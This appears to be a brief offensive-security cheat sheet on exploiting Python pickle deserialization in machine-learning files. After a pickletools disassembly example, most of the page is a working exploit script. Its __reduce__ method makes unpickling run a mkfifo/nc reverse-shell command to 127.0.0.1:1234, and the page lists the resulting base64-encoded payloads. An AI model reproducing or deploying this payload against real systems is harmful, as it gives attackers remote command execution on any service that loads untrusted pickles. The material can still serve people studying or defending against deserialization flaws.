Python Deseralization
Python Deseralization¶
Exploiting machine learning pickle files
Pickle¶
Disassemble a Pickle File:
python -m pickletools <file.pickle>
0: \x80 PROTO 3
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
Sample Exploit:
import base64, pickle
import _pickle as cPickle
class RCE(object):
def __reduce__(self):
import os
cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f'
fn = 'os.system'
return (eval(fn), (cmd,))
if __name__ == '__main__':
#Pickle Exploit
pickled = pickle.dumps(RCE())
print(base64.urlsafe_b64encode(pickled))
#b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='
#cPickle Exploit
cpickled = cPickle.dumps(RCE())
print(base64.urlsafe_b64encode(cpickled))
#b'gASVbgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjFNybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL3NoIC1pIDI-JjEgfCBuYyAxMjcuMC4wLjEgMTIzNCA-IC90bXAvZpSFlFKULg=='